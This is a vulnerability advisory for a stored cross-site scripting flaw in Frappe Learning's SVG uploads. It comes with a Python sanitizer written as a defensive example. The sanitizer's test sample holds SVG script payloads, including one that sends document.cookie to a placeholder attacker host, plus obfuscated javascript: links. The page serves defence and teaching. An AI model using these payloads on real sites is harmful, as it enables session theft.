CVE-2025-55006
Published: 09 August 2025
Summary
CVE-2025-55006 is a medium-severity Improper Input Validation (CWE-20) vulnerability in Frappe Learning. Its CVSS base score is 4.3 (Medium).
Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks in the top 42.9% of CVEs by exploit likelihood and is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2025-55006 is an improper input validation vulnerability (CWE-20) in Frappe Learning, a learning management system for structuring content. It affects versions 2.33.0 and below, specifically in the image upload functionality, which fails to adequately sanitize uploaded SVG files. This allows attackers to upload SVGs containing embedded JavaScript or other malicious content.
The vulnerability has a CVSS v3.1 base score of 4.3 (AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L). Exploitation requires an attacker who already holds a highly privileged account (PR:H) to upload a malicious SVG through the image upload feature, and a victim who then opens it (UI:R). Browsers do not run script in an SVG referenced from an <img> element, so the payload fires when the file is opened as a document: by navigating to its URL directly, or via <object> or <iframe> embedding. The embedded script then executes in the victim's browser with the victim's session, which makes this a stored cross-site scripting (XSS) issue.
The GitHub security advisory (GHSA-mvxw-r9x4-3vrr) documents the issue. The fix is planned for version 2.34.0; upgrade to that release once it is available and, until then, restrict or sanitize SVG uploads.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-24031
Vulnerability details
Frappe Learning is a learning system that helps users structure their content. In versions 2.33.0 and below, the image upload functionality did not adequately sanitize uploaded SVG files. This allowed users to upload SVG files containing embedded JavaScript or other potentially malicious content. Malicious SVG files could be used to execute arbitrary scripts in the context of other users. A fix for this issue is planned for version 2.34.0.
- CWE(s): CWE-20 (Improper Input Validation)
Related Threats
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The image upload of a public-facing LMS can be exploited directly from the network (T1190, Exploit Public-Facing Application); the unsanitized SVG is then the delivery vehicle for a JavaScript payload that runs in other users' browsers (T1059.007, JavaScript; T1027.017, SVG Smuggling).
Affected Assets
Frappe Learning, versions 2.33.0 and below (image upload functionality).
Mitigating Controls (NIST 800-53 r5)
- SI-10 (Information Input Validation): directly requires validation and sanitization of all input, including uploaded SVG files, to block embedded scripts before storage or rendering.
- SI-3 (Malicious Code Protection): mandates mechanisms to detect and block malicious code (e.g., embedded JavaScript) within user-uploaded content such as SVGs.
- SI-15 (Information Output Filtering): requires filtering of information outputs to remove or neutralize active content such as scripts before delivery to other users' browsers.
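The following is an added example of the input-validation control described above applied to the SVG vectors described in the deeper analysis. It is not Frappe Learning's code and not the fix planned for 2.34.0 (which this page does not describe); it is a stdlib-only Python sanitizer, Python being the language of the Frappe stack. It parses the SVG as XML rather than pattern-matching the raw text, so entity-encoded and whitespace-split `javascript:` URLs are caught after decoding; it drops script-bearing elements (`script`, `foreignObject`, `animate`/`set`, which can animate an `href` to `javascript:` after upload), strips every `on*` event handler attribute, and allows only fragment, relative, http(s) and raster `data:` URLs in `href`/`xlink:href`. The two SVG samples are constructed for the demonstration, `attacker.example` is a placeholder, and the forbidden-element list is a conservative choice rather than a standard.

```python
import re
import xml.etree.ElementTree as ET

# Stdlib ElementTree keeps this runnable offline; for real uploads parse with
# defusedxml (same API) so entity-expansion bombs are refused as well.
SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)
ET.register_namespace("xlink", XLINK_NS)

ALLOWED_NS = {SVG_NS, ""}
# Elements that run script, embed (X)HTML, or can rewrite an href to
# javascript: after sanitisation (animate/set target attributes by name).
FORBIDDEN_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object",
                      "animate", "set", "handler"}
SAFE_SCHEMES = {"http", "https"}
SAFE_DATA_URL = re.compile(r"^data:image/(png|jpe?g|gif|webp);base64,", re.I)


def _local(qname):
    return qname.rsplit("}", 1)[-1]          # "{ns}name" -> "name"


def _namespace(qname):
    return qname[1:].rsplit("}", 1)[0] if qname.startswith("{") else ""


def _safe_url(value):
    # Browsers ignore tabs/newlines inside a scheme ("java\tscript:"), so strip
    # C0 controls and spaces before classifying; the XML parser has already
    # decoded entity evasions such as &#106;avascript:.
    v = re.sub(r"[\x00-\x20]", "", value)
    if v.startswith("#"):
        return True                          # local fragment reference
    m = re.match(r"^([a-z][a-z0-9+.\-]*):", v, re.I)
    if not m:
        return True                          # relative URL, no scheme
    scheme = m.group(1).lower()
    if scheme == "data":
        return bool(SAFE_DATA_URL.match(v))  # raster data: URLs only
    return scheme in SAFE_SCHEMES


def _clean_attributes(elem, findings):
    for key in list(elem.attrib):
        name = _local(key).lower()           # covers href and xlink:href alike
        if name.startswith("on"):            # onload, onclick, onerror, onbegin ...
            findings.append(f"attr:{name}")
        elif name == "href" and not _safe_url(elem.attrib[key]):
            findings.append(f"href:{elem.attrib[key].strip()[:40]}")
        else:
            continue
        del elem.attrib[key]


def _clean_children(elem, findings):
    for child in list(elem):
        if not isinstance(child.tag, str):   # comments / processing instructions
            elem.remove(child)
            continue
        name = _local(child.tag)
        if _namespace(child.tag) not in ALLOWED_NS or name in FORBIDDEN_ELEMENTS:
            findings.append(f"element:{name}")
            elem.remove(child)               # drops the whole subtree
            continue
        _clean_attributes(child, findings)
        _clean_children(child, findings)


def sanitize_svg(svg_text):
    """Return (sanitised SVG, list of removed items). An empty list means the
    file was already clean; a non-empty one is what you log, or reject on."""
    root = ET.fromstring(svg_text)
    if _local(root.tag) != "svg" or _namespace(root.tag) not in ALLOWED_NS:
        raise ValueError("not an SVG document")
    findings = []
    _clean_attributes(root, findings)
    _clean_children(root, findings)
    return ET.tostring(root, encoding="unicode"), findings


# Constructed samples, not taken from the advisory; attacker.example is a placeholder.
MALICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(document.cookie)">
  <rect width="100" height="100" fill="red"/>
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><text x="10" y="50">click me</text></a>
  <animate attributeName="href" values="javascript:alert(2)"/>
  <foreignObject><body xmlns="http://www.w3.org/1999/xhtml"><img src="x" onerror="alert(3)"/></body></foreignObject>
  <image href="&#106;ava&#9;script:alert(4)"/>
</svg>"""
BENIGN_SVG = ('<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
              '<circle cx="5" cy="5" r="4" fill="#c00"/></svg>')

if __name__ == "__main__":
    clean, findings = sanitize_svg(MALICIOUS_SVG)
    print(findings)                          # six removals, then the cleaned document
    print(clean)
```

On the malicious sample the sanitizer reports six removals (the root `onload`, the `script`, `animate` and `foreignObject` elements, and both `javascript:` hrefs, including the entity- and tab-obfuscated one) while keeping the `rect` and the link text; the benign sample comes back with an empty findings list. Whether to reject uploads with findings or to store the cleaned file is a policy choice; rejecting is the safer default for an LMS, since a non-empty list means someone tried. `<style>` content is deliberately left alone because CSS cannot execute script in current browsers. Sanitising on upload is the SI-10 side; because an SVG only runs script when opened as a document, serving uploads with `Content-Disposition: attachment`, a `Content-Security-Policy: sandbox` header, or from a separate origin is the complementary SI-15 output-side control and also covers payload idioms this sanitizer does not recognise.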